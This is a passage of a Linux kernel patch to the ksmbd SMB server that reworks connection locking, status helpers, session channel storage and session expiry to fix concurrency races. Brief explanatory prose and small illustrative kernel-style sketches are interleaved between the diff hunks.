++			wait_event(bind_conn->req_running_q,
++				atomic_read(&bind_conn->req_running) == 0);
++		}
++	}
++	up_read(&conn_list_lock);
+ }
+ 
+ int ksmbd_conn_write(struct ksmbd_work *work)
+@@ -245,7 +273,7 @@ bool ksmbd_conn_alive(struct ksmbd_conn *conn)
+ 	if (!ksmbd_server_running())
+ 		return false;
+ 
+-	if (conn->status == KSMBD_SESS_EXITING)
++	if (ksmbd_conn_exiting(conn))
+ 		return false;
+ 
+ 	if (kthread_should_stop())
+@@ -305,7 +333,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		pdu_size = get_rfc1002_len(hdr_buf);
+ 		ksmbd_debug(CONN, "RFC1002 header %u bytes\n", pdu_size);
+ 
+-		if (conn->status == KSMBD_SESS_GOOD)
++		if (ksmbd_conn_good(conn))
+ 			max_allowed_pdu_size =
+ 				SMB3_MAX_MSGSIZE + conn->vals->max_write_size;
+ 		else
+@@ -314,7 +342,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		if (pdu_size > max_allowed_pdu_size) {
+ 			pr_err_ratelimited("PDU length(%u) excceed maximum allowed pdu size(%u) on connection(%d)\n",
+ 					pdu_size, max_allowed_pdu_size,
+-					conn->status);
++					READ_ONCE(conn->status));
+ 			break;
+ 		}
+ 
+@@ -362,10 +390,10 @@ int ksmbd_conn_handler_loop(void *p)
+ 	}
+ 
+ out:
++	ksmbd_conn_set_releasing(conn);
+ 	/* Wait till all reference dropped to the Server object*/
+ 	wait_event(conn->r_count_q, atomic_read(&conn->r_count) == 0);
+ 
+-
+ 	if (IS_ENABLED(CONFIG_UNICODE))
+ 		utf8_unload(conn->um);
+ 	unload_nls(conn->local_nls);
+@@ -409,7 +437,7 @@ static void stop_sessions(void)
+ 	struct ksmbd_transport *t;
+ 
+ again:
+-	read_lock(&conn_list_lock);
++	down_read(&conn_list_lock);
+ 	list_for_each_entry(conn, &conn_list, conns_list) {
+ 		struct task_struct *task;
+ 
+@@ -418,14 +446,14 @@ again:
+ 		if (task)
+ 			ksmbd_debug(CONN, "Stop session handler %s/%d\n",
+ 				    task->comm, task_pid_nr(task));
+-		conn->status = KSMBD_SESS_EXITING;
++		ksmbd_conn_set_exiting(conn);
+ 		if (t->ops->shutdown) {
+-			read_unlock(&conn_list_lock);
++			up_read(&conn_list_lock);
+ 			t->ops->shutdown(t);
+-			read_lock(&conn_list_lock);
++			down_read(&conn_list_lock);
+ 		}
+ 	}
+-	read_unlock(&conn_list_lock);
++	up_read(&conn_list_lock);
+ 
+ 	if (!list_empty(&conn_list)) {
+ 		schedule_timeout_interruptible(HZ / 10); /* 100ms */
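
The rwlock-to-rw_semaphore conversion through connection.c is functional,
not cosmetic: the new ksmbd_conn_wait_idle() sleeps in wait_event() while
conn_list_lock is held, which is illegal under a spinning rwlock but
allowed under a sleeping rw_semaphore. The shape of the new locking, as a
minimal kernel-style sketch:

#include <linux/rwsem.h>
#include <linux/wait.h>
#include <linux/atomic.h>

static DECLARE_RWSEM(list_lock_sketch);

static void wait_idle_sketch(wait_queue_head_t *wq, atomic_t *req_running)
{
	down_read(&list_lock_sketch);
	/* unlike a rwlock, sleeping here with the lock held is fine */
	wait_event(*wq, atomic_read(req_running) == 0);
	up_read(&list_lock_sketch);
}
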
+diff --git a/fs/ksmbd/connection.h b/fs/ksmbd/connection.h
+index 0e3a848defaf3..ad8dfaa48ffb3 100644
+--- a/fs/ksmbd/connection.h
++++ b/fs/ksmbd/connection.h
+@@ -26,7 +26,8 @@ enum {
+ 	KSMBD_SESS_GOOD,
+ 	KSMBD_SESS_EXITING,
+ 	KSMBD_SESS_NEED_RECONNECT,
+-	KSMBD_SESS_NEED_NEGOTIATE
++	KSMBD_SESS_NEED_NEGOTIATE,
++	KSMBD_SESS_RELEASING
+ };
+ 
+ struct ksmbd_stats {
+@@ -140,10 +141,10 @@ struct ksmbd_transport {
+ #define KSMBD_TCP_PEER_SOCKADDR(c)	((struct sockaddr *)&((c)->peer_addr))
+ 
+ extern struct list_head conn_list;
+-extern rwlock_t conn_list_lock;
++extern struct rw_semaphore conn_list_lock;
+ 
+ bool ksmbd_conn_alive(struct ksmbd_conn *conn);
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn);
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id);
+ struct ksmbd_conn *ksmbd_conn_alloc(void);
+ void ksmbd_conn_free(struct ksmbd_conn *conn);
+ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c);
+@@ -162,6 +163,8 @@ void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops);
+ int ksmbd_conn_handler_loop(void *p);
+ int ksmbd_conn_transport_init(void);
+ void ksmbd_conn_transport_destroy(void);
++void ksmbd_conn_lock(struct ksmbd_conn *conn);
++void ksmbd_conn_unlock(struct ksmbd_conn *conn);
+ 
+ /*
+  * WARNING
+@@ -169,43 +172,60 @@ void ksmbd_conn_transport_destroy(void);
+  * This is a hack. We will move status to a proper place once we land
+  * a multi-sessions support.
+  */
+-static inline bool ksmbd_conn_good(struct ksmbd_work *work)
++static inline bool ksmbd_conn_good(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_GOOD;
++	return READ_ONCE(conn->status) == KSMBD_SESS_GOOD;
+ }
+ 
+-static inline bool ksmbd_conn_need_negotiate(struct ksmbd_work *work)
++static inline bool ksmbd_conn_need_negotiate(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_NEED_NEGOTIATE;
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_NEGOTIATE;
+ }
+ 
+-static inline bool ksmbd_conn_need_reconnect(struct ksmbd_work *work)
++static inline bool ksmbd_conn_need_reconnect(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_NEED_RECONNECT;
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_RECONNECT;
+ }
+ 
+-static inline bool ksmbd_conn_exiting(struct ksmbd_work *work)
++static inline bool ksmbd_conn_exiting(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_EXITING;
++	return READ_ONCE(conn->status) == KSMBD_SESS_EXITING;
+ }
+ 
+-static inline void ksmbd_conn_set_good(struct ksmbd_work *work)
++static inline bool ksmbd_conn_releasing(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_GOOD;
++	return READ_ONCE(conn->status) == KSMBD_SESS_RELEASING;
+ }
+ 
+-static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_new(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_NEED_NEGOTIATE;
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEW);
+ }
+ 
+-static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_good(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_NEED_RECONNECT;
++	WRITE_ONCE(conn->status, KSMBD_SESS_GOOD);
+ }
+ 
+-static inline void ksmbd_conn_set_exiting(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_EXITING;
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_NEGOTIATE);
+ }
++
++static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_RECONNECT);
++}
++
++static inline void ksmbd_conn_set_exiting(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_EXITING);
++}
++
++static inline void ksmbd_conn_set_releasing(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_RELEASING);
++}
++
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status);
+ #endif /* __CONNECTION_H__ */
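
All connection-status accesses now funnel through helpers built on
READ_ONCE()/WRITE_ONCE(). These do not add memory ordering; they stop the
compiler from tearing, caching, or re-reading the field, which matters now
that several threads poll and flip conn->status without a lock. The
pattern in isolation (sketch; the numeric state is illustrative):

#include <linux/compiler.h>

struct conn_sketch {
	int status;	/* read and written concurrently, no lock */
};

static inline bool conn_exiting_sketch(struct conn_sketch *c)
{
	return READ_ONCE(c->status) == 2;	/* 2 stands for "exiting" */
}

static inline void conn_set_exiting_sketch(struct conn_sketch *c)
{
	WRITE_ONCE(c->status, 2);
}
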
+diff --git a/fs/ksmbd/mgmt/tree_connect.c b/fs/ksmbd/mgmt/tree_connect.c
+index f19de20c2960c..f07a05f376513 100644
+--- a/fs/ksmbd/mgmt/tree_connect.c
++++ b/fs/ksmbd/mgmt/tree_connect.c
+@@ -137,6 +137,9 @@ int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
+ 	struct ksmbd_tree_connect *tc;
+ 	unsigned long id;
+ 
++	if (!sess)
++		return -EINVAL;
++
+ 	xa_for_each(&sess->tree_conns, id, tc)
+ 		ret |= ksmbd_tree_conn_disconnect(sess, tc);
+ 	xa_destroy(&sess->tree_conns);
+diff --git a/fs/ksmbd/mgmt/user_session.c b/fs/ksmbd/mgmt/user_session.c
+index 92b1603b5abeb..ea4b56d570fbb 100644
+--- a/fs/ksmbd/mgmt/user_session.c
++++ b/fs/ksmbd/mgmt/user_session.c
+@@ -30,15 +30,15 @@ struct ksmbd_session_rpc {
+ 
+ static void free_channel_list(struct ksmbd_session *sess)
+ {
+-	struct channel *chann, *tmp;
++	struct channel *chann;
++	unsigned long index;
+ 
+-	write_lock(&sess->chann_lock);
+-	list_for_each_entry_safe(chann, tmp, &sess->ksmbd_chann_list,
+-				 chann_list) {
+-		list_del(&chann->chann_list);
++	xa_for_each(&sess->ksmbd_chann_list, index, chann) {
++		xa_erase(&sess->ksmbd_chann_list, index);
+ 		kfree(chann);
+ 	}
+-	write_unlock(&sess->chann_lock);
++
++	xa_destroy(&sess->ksmbd_chann_list);
+ }
+ 
+ static void __session_rpc_close(struct ksmbd_session *sess,
+@@ -153,10 +153,6 @@ void ksmbd_session_destroy(struct ksmbd_session *sess)
+ 	if (!sess)
+ 		return;
+ 
+-	down_write(&sessions_table_lock);
+-	hash_del(&sess->hlist);
+-	up_write(&sessions_table_lock);
+-
+ 	if (sess->user)
+ 		ksmbd_free_user(sess->user);
+ 
+@@ -174,76 +170,101 @@ static struct ksmbd_session *__session_lookup(unsigned long long id)
+ 	struct ksmbd_session *sess;
+ 
+ 	hash_for_each_possible(sessions_table, sess, hlist, id) {
+-		if (id == sess->id)
++		if (id == sess->id) {
++			sess->last_active = jiffies;
+ 			return sess;
++		}
+ 	}
+ 	return NULL;
+ }
+ 
++static void ksmbd_expire_session(struct ksmbd_conn *conn)
++{
++	unsigned long id;
++	struct ksmbd_session *sess;
++
++	down_write(&sessions_table_lock);
++	xa_for_each(&conn->sessions, id, sess) {
++		if (sess->state != SMB2_SESSION_VALID ||
++		    time_after(jiffies,
++			       sess->last_active + SMB2_SESSION_TIMEOUT)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++			continue;
++		}
++	}
++	up_write(&sessions_table_lock);
++}
++
+ int ksmbd_session_register(struct ksmbd_conn *conn,
+ 			   struct ksmbd_session *sess)
+ {
+ 	sess->dialect = conn->dialect;
+ 	memcpy(sess->ClientGUID, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
++	ksmbd_expire_session(conn);
+ 	return xa_err(xa_store(&conn->sessions, sess->id, sess, GFP_KERNEL));
+ }
+ 
+ static int ksmbd_chann_del(struct ksmbd_conn *conn, struct ksmbd_session *sess)
+ {
+-	struct channel *chann, *tmp;
+-
+-	write_lock(&sess->chann_lock);
+-	list_for_each_entry_safe(chann, tmp, &sess->ksmbd_chann_list,
+-				 chann_list) {
+-		if (chann->conn == conn) {
+-			list_del(&chann->chann_list);
+-			kfree(chann);
+-			write_unlock(&sess->chann_lock);
+-			return 0;
+-		}
+-	}
+-	write_unlock(&sess->chann_lock);
++	struct channel *chann;
+ 
+-	return -ENOENT;
++	chann = xa_erase(&sess->ksmbd_chann_list, (long)conn);
++	if (!chann)
++		return -ENOENT;
++
++	kfree(chann);
++	return 0;
+ }
+ 
+ void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
+ {
+ 	struct ksmbd_session *sess;
++	unsigned long id;
+ 
++	down_write(&sessions_table_lock);
+ 	if (conn->binding) {
+ 		int bkt;
++		struct hlist_node *tmp;
+ 
+-		down_write(&sessions_table_lock);
+-		hash_for_each(sessions_table, bkt, sess, hlist) {
+-			if (!ksmbd_chann_del(conn, sess)) {
+-				up_write(&sessions_table_lock);
+-				goto sess_destroy;
++		hash_for_each_safe(sessions_table, bkt, tmp, sess, hlist) {
++			if (!ksmbd_chann_del(conn, sess) &&
++			    xa_empty(&sess->ksmbd_chann_list)) {
++				hash_del(&sess->hlist);
++				ksmbd_session_destroy(sess);
+ 			}
+ 		}
+-		up_write(&sessions_table_lock);
+-	} else {
+-		unsigned long id;
+-
+-		xa_for_each(&conn->sessions, id, sess) {
+-			if (!ksmbd_chann_del(conn, sess))
+-				goto sess_destroy;
+-		}
+ 	}
+ 
+-	return;
++	xa_for_each(&conn->sessions, id, sess) {
++		unsigned long chann_id;
++		struct channel *chann;
++
++		xa_for_each(&sess->ksmbd_chann_list, chann_id, chann) {
++			if (chann->conn != conn)
++				ksmbd_conn_set_exiting(chann->conn);
++		}
+ 
+-sess_destroy:
+-	if (list_empty(&sess->ksmbd_chann_list)) {
+-		xa_erase(&conn->sessions, sess->id);
+-		ksmbd_session_destroy(sess);
++		ksmbd_chann_del(conn, sess);
++		if (xa_empty(&sess->ksmbd_chann_list)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++		}
+ 	}
++	up_write(&sessions_table_lock);
+ }
+ 
+ struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+ 					   unsigned long long id)
+ {
+-	return xa_load(&conn->sessions, id);
++	struct ksmbd_session *sess;
++
++	sess = xa_load(&conn->sessions, id);
++	if (sess)
++		sess->last_active = jiffies;
++	return sess;
+ }
+ 
+ struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
+@@ -252,6 +273,8 @@ struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
+ 
+ 	down_read(&sessions_table_lock);
+ 	sess = __session_lookup(id);
++	if (sess)
++		sess->last_active = jiffies;
+ 	up_read(&sessions_table_lock);
+ 
+ 	return sess;
+@@ -320,6 +343,9 @@ static struct ksmbd_session *__session_create(int protocol)
+ 	struct ksmbd_session *sess;
+ 	int ret;
+ 
++	if (protocol != CIFDS_SESSION_FLAG_SMB2)
++		return NULL;
++
+ 	sess = kzalloc(sizeof(struct ksmbd_session), GFP_KERNEL);
+ 	if (!sess)
+ 		return NULL;
+@@ -327,32 +353,24 @@ static struct ksmbd_session *__session_create(int protocol)
+ 	if (ksmbd_init_file_table(&sess->file_table))
+ 		goto error;
+ 
++	sess->last_active = jiffies;
++	sess->state = SMB2_SESSION_IN_PROGRESS;
+ 	set_session_flag(sess, protocol);
+ 	xa_init(&sess->tree_conns);
+-	INIT_LIST_HEAD(&sess->ksmbd_chann_list);
++	xa_init(&sess->ksmbd_chann_list);
+ 	INIT_LIST_HEAD(&sess->rpc_handle_list);
+ 	sess->sequence_number = 1;
+-	rwlock_init(&sess->chann_lock);
+-
+-	switch (protocol) {
+-	case CIFDS_SESSION_FLAG_SMB2:
+-		ret = __init_smb2_session(sess);
+-		break;
+-	default:
+-		ret = -EINVAL;
+-		break;
+-	}
+ 
++	ret = __init_smb2_session(sess);
+ 	if (ret)
+ 		goto error;
+ 
+ 	ida_init(&sess->tree_conn_ida);
+ 
+-	if (protocol == CIFDS_SESSION_FLAG_SMB2) {
+-		down_write(&sessions_table_lock);
+-		hash_add(sessions_table, &sess->hlist, sess->id);
+-		up_write(&sessions_table_lock);
+-	}
++	down_write(&sessions_table_lock);
++	hash_add(sessions_table, &sess->hlist, sess->id);
++	up_write(&sessions_table_lock);
++
+ 	return sess;
+ 
+ error:
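
The session channel list becomes an xarray keyed by the connection
pointer, turning the old list walks under a rwlock into direct keyed
xa_load()/xa_erase() calls with the xarray's own internal locking. The
core operations, as a self-contained kernel-style sketch (names are
illustrative):

#include <linux/xarray.h>
#include <linux/slab.h>

struct chann_sketch { void *conn; };

static DEFINE_XARRAY(chann_xa_sketch);

static int chann_add_sketch(void *conn)
{
	struct chann_sketch *ch = kmalloc(sizeof(*ch), GFP_KERNEL);
	void *old;

	if (!ch)
		return -ENOMEM;
	ch->conn = conn;
	/* key the entry by the connection pointer itself */
	old = xa_store(&chann_xa_sketch, (unsigned long)conn, ch, GFP_KERNEL);
	if (xa_is_err(old)) {
		kfree(ch);
		return xa_err(old);
	}
	return 0;
}

static int chann_del_sketch(void *conn)
{
	struct chann_sketch *ch;

	ch = xa_erase(&chann_xa_sketch, (unsigned long)conn);
	if (!ch)
		return -ENOENT;
	kfree(ch);
	return 0;
}
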
+diff --git a/fs/ksmbd/mgmt/user_session.h b/fs/ksmbd/mgmt/user_session.h
+index 8934b8ee275ba..51f38e5b61abb 100644
+--- a/fs/ksmbd/mgmt/user_session.h
++++ b/fs/ksmbd/mgmt/user_session.h
+@@ -21,7 +21,6 @@ struct ksmbd_file_table;
+ struct channel {
+ 	__u8			smb3signingkey[SMB3_SIGN_KEY_SIZE];
+ 	struct ksmbd_conn	*conn;
+-	struct list_head	chann_list;
+ };
+ 
+ struct preauth_session {
+@@ -50,8 +49,7 @@ struct ksmbd_session {
+ 	char				sess_key[CIFS_KEY_SIZE];
+ 
+ 	struct hlist_node		hlist;
+-	rwlock_t			chann_lock;
+-	struct list_head		ksmbd_chann_list;
++	struct xarray			ksmbd_chann_list;
+ 	struct xarray			tree_conns;
+ 	struct ida			tree_conn_ida;
+ 	struct list_head		rpc_handle_list;
+@@ -61,6 +59,7 @@ struct ksmbd_session {
+ 	__u8				smb3signingkey[SMB3_SIGN_KEY_SIZE];
+ 
+ 	struct ksmbd_file_table		file_table;
++	unsigned long			last_active;
+ };
+ 
+ static inline int test_session_flag(struct ksmbd_session *sess, int bit)
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index 8c2bc513445c3..8a0ad399f2456 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -93,7 +93,8 @@ static inline int check_conn_state(struct ksmbd_work *work)
+ {
+ 	struct smb_hdr *rsp_hdr;
+ 
+-	if (ksmbd_conn_exiting(work) || ksmbd_conn_need_reconnect(work)) {
++	if (ksmbd_conn_exiting(work->conn) ||
++	    ksmbd_conn_need_reconnect(work->conn)) {
+ 		rsp_hdr = work->response_buf;
+ 		rsp_hdr->Status.CifsError = STATUS_CONNECTION_DISCONNECTED;
+ 		return 1;
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index acd66fb40c5f0..8f96b96dbac1a 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -74,14 +74,7 @@ static inline bool check_session_id(struct ksmbd_conn *conn, u64 id)
+ 
+ struct channel *lookup_chann_list(struct ksmbd_session *sess, struct ksmbd_conn *conn)
+ {
+-	struct channel *chann;
+-
+-	list_for_each_entry(chann, &sess->ksmbd_chann_list, chann_list) {
+-		if (chann->conn == conn)
+-			return chann;
+-	}
+-
+-	return NULL;
++	return xa_load(&sess->ksmbd_chann_list, (long)conn);
+ }
+ 
+ /**
+@@ -254,7 +247,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 
+ 	rsp = smb2_get_msg(work->response_buf);
+ 
+-	WARN_ON(ksmbd_conn_good(work));
++	WARN_ON(ksmbd_conn_good(conn));
+ 
+ 	rsp->StructureSize = cpu_to_le16(65);
+ 	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+@@ -284,7 +277,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
+ 	conn->use_spnego = true;
+ 
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_conn_set_need_negotiate(conn);
+ 	return 0;
+ }
+ 
+@@ -574,7 +567,7 @@ int smb2_check_user_session(struct ksmbd_work *work)
+ 	    cmd == SMB2_SESSION_SETUP_HE)
+ 		return 0;
+ 
+-	if (!ksmbd_conn_good(work))
++	if (!ksmbd_conn_good(conn))
+ 		return -EINVAL;
+ 
+ 	sess_id = le64_to_cpu(req_hdr->SessionId);
+@@ -592,6 +585,7 @@ static void destroy_previous_session(struct ksmbd_conn *conn,
+ 	struct ksmbd_session *prev_sess = ksmbd_session_lookup_slowpath(id);
+ 	struct ksmbd_user *prev_user;
+ 	struct channel *chann;
++	long index;
+ 
+ 	if (!prev_sess)
+ 		return;
+@@ -605,10 +599,8 @@ static void destroy_previous_session(struct ksmbd_conn *conn,
+ 		return;
+ 
+ 	prev_sess->state = SMB2_SESSION_EXPIRED;
+-	write_lock(&prev_sess->chann_lock);
+-	list_for_each_entry(chann, &prev_sess->ksmbd_chann_list, chann_list)
+-		chann->conn->status = KSMBD_SESS_EXITING;
+-	write_unlock(&prev_sess->chann_lock);
++	xa_for_each(&prev_sess->ksmbd_chann_list, index, chann)
++		ksmbd_conn_set_exiting(chann->conn);
+ }
+ 
+ /**
+@@ -1075,7 +1067,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "Received negotiate request\n");
+ 	conn->need_neg = false;
+-	if (ksmbd_conn_good(work)) {
++	if (ksmbd_conn_good(conn)) {
+ 		pr_err("conn->tcp_status is already in CifsGood State\n");
+ 		work->send_no_response = 1;
+ 		return rc;
+@@ -1230,7 +1222,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 	}
+ 
+ 	conn->srv_sec_mode = le16_to_cpu(rsp->SecurityMode);
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_conn_set_need_negotiate(conn);
+ 
+ err_out:
+ 	if (rc < 0)
+@@ -1520,19 +1512,14 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 
+ binding_session:
+ 	if (conn->dialect >= SMB30_PROT_ID) {
+-		read_lock(&sess->chann_lock);
+ 		chann = lookup_chann_list(sess, conn);
+-		read_unlock(&sess->chann_lock);
+ 		if (!chann) {
+ 			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+ 			if (!chann)
+ 				return -ENOMEM;
+ 
+ 			chann->conn = conn;
+-			INIT_LIST_HEAD(&chann->chann_list);
+-			write_lock(&sess->chann_lock);
+-			list_add(&chann->chann_list, &sess->ksmbd_chann_list);
+-			write_unlock(&sess->chann_lock);
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+ 		}
+ 	}
+ 
+@@ -1606,19 +1593,14 @@ static int krb5_authenticate(struct ksmbd_work *work)
+ 	}
+ 
+ 	if (conn->dialect >= SMB30_PROT_ID) {
+-		read_lock(&sess->chann_lock);
+ 		chann = lookup_chann_list(sess, conn);
+-		read_unlock(&sess->chann_lock);
+ 		if (!chann) {
+ 			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+ 			if (!chann)
+ 				return -ENOMEM;
+ 
+ 			chann->conn = conn;
+-			INIT_LIST_HEAD(&chann->chann_list);
+-			write_lock(&sess->chann_lock);
+-			list_add(&chann->chann_list, &sess->ksmbd_chann_list);
+-			write_unlock(&sess->chann_lock);
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+ 		}
+ 	}
+ 
+@@ -1661,6 +1643,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 	rsp->SecurityBufferLength = 0;
+ 	inc_rfc1001_len(work->response_buf, 9);
+ 
++	ksmbd_conn_lock(conn);
+ 	if (!req->hdr.SessionId) {
+ 		sess = ksmbd_smb2_session_create();
+ 		if (!sess) {
+@@ -1708,6 +1691,12 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			goto out_err;
+ 		}
+ 
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
++
+ 		if (ksmbd_session_lookup(conn, sess_id)) {
+ 			rc = -EACCES;
+ 			goto out_err;
+@@ -1732,12 +1721,20 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			rc = -ENOENT;
+ 			goto out_err;
+ 		}
++
++		if (sess->state == SMB2_SESSION_EXPIRED) {
++			rc = -EFAULT;
++			goto out_err;
++		}
++
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
+ 	}
+ 	work->sess = sess;
+ 
+-	if (sess->state == SMB2_SESSION_EXPIRED)
+-		sess->state = SMB2_SESSION_IN_PROGRESS;
+-
+ 	negblob_off = le16_to_cpu(req->SecurityBufferOffset);
+ 	negblob_len = le16_to_cpu(req->SecurityBufferLength);
+ 	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer) ||
+@@ -1767,8 +1764,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				goto out_err;
+ 			}
+ 
+-			ksmbd_conn_set_good(work);
+-			sess->state = SMB2_SESSION_VALID;
++			if (!ksmbd_conn_need_reconnect(conn)) {
++				ksmbd_conn_set_good(conn);
++				sess->state = SMB2_SESSION_VALID;
++			}
+ 			kfree(sess->Preauth_HashValue);
+ 			sess->Preauth_HashValue = NULL;
+ 		} else if (conn->preferred_auth_mech == KSMBD_AUTH_NTLMSSP) {
+@@ -1790,8 +1789,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				if (rc)
+ 					goto out_err;
+ 
+-				ksmbd_conn_set_good(work);
+-				sess->state = SMB2_SESSION_VALID;
++				if (!ksmbd_conn_need_reconnect(conn)) {
++					ksmbd_conn_set_good(conn);
++					sess->state = SMB2_SESSION_VALID;
++				}
+ 				if (conn->binding) {
+ 					struct preauth_session *preauth_sess;
+ 
+@@ -1859,14 +1860,17 @@ out_err:
+ 			if (sess->user && sess->user->flags & KSMBD_USER_FLAG_DELAY_SESSION)
+ 				try_delay = true;
+ 
+-			xa_erase(&conn->sessions, sess->id);
+-			ksmbd_session_destroy(sess);
+-			work->sess = NULL;
+-			if (try_delay)
++			sess->last_active = jiffies;
++			sess->state = SMB2_SESSION_EXPIRED;
++			if (try_delay) {
++				ksmbd_conn_set_need_reconnect(conn);
+ 				ssleep(5);
++				ksmbd_conn_set_need_negotiate(conn);
++			}
+ 		}
+ 	}
+ 
++	ksmbd_conn_unlock(conn);
+ 	return rc;
+ }
+ 
+@@ -2091,21 +2095,25 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct smb2_logoff_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_session *sess;
++	struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
++	u64 sess_id = le64_to_cpu(req->hdr.SessionId);
+ 
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	inc_rfc1001_len(work->response_buf, 4);
+ 
+ 	ksmbd_debug(SMB, "request\n");
+ 
+-	/* setting CifsExiting here may race with start_tcp_sess */
+-	ksmbd_conn_set_need_reconnect(work);
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_RECONNECT);
+ 	ksmbd_close_session_fds(work);
+-	ksmbd_conn_wait_idle(conn);
++	ksmbd_conn_wait_idle(conn, sess_id);
+ 
++	/*
++	 * Re-lookup the session to check whether it was deleted
++	 * while waiting for in-flight requests to complete
++	 */
++	sess = ksmbd_session_lookup_all(conn, sess_id);
+ 	if (ksmbd_tree_conn_session_logoff(sess)) {
+-		struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
+-
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+ 		smb2_set_err_rsp(work);
+@@ -2117,9 +2125,7 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ 
+ 	ksmbd_free_user(sess->user);
+ 	sess->user = NULL;
+-
+-	/* let start_tcp_sess free connection info now */
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_NEGOTIATE);
+ 	return 0;
+ }
+ 
+@@ -6947,7 +6953,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 
+ 		nolock = 1;
+ 		/* check locks in connection list */
+-		read_lock(&conn_list_lock);
++		down_read(&conn_list_lock);
+ 		list_for_each_entry(conn, &conn_list, conns_list) {
+ 			spin_lock(&conn->llist_lock);
+ 			list_for_each_entry_safe(cmp_lock, tmp2, &conn->lock_list, clist) {
+@@ -6964,7 +6970,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 						list_del(&cmp_lock->flist);
+ 						list_del(&cmp_lock->clist);
+ 						spin_unlock(&conn->llist_lock);
+-						read_unlock(&conn_list_lock);
++						up_read(&conn_list_lock);
+ 
+ 						locks_free_lock(cmp_lock->fl);
+ 						kfree(cmp_lock);
+@@ -6986,7 +6992,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    cmp_lock->start > smb_lock->start &&
+ 				    cmp_lock->start < smb_lock->end) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("previous lock conflict with zero byte lock range\n");
+ 					goto out;
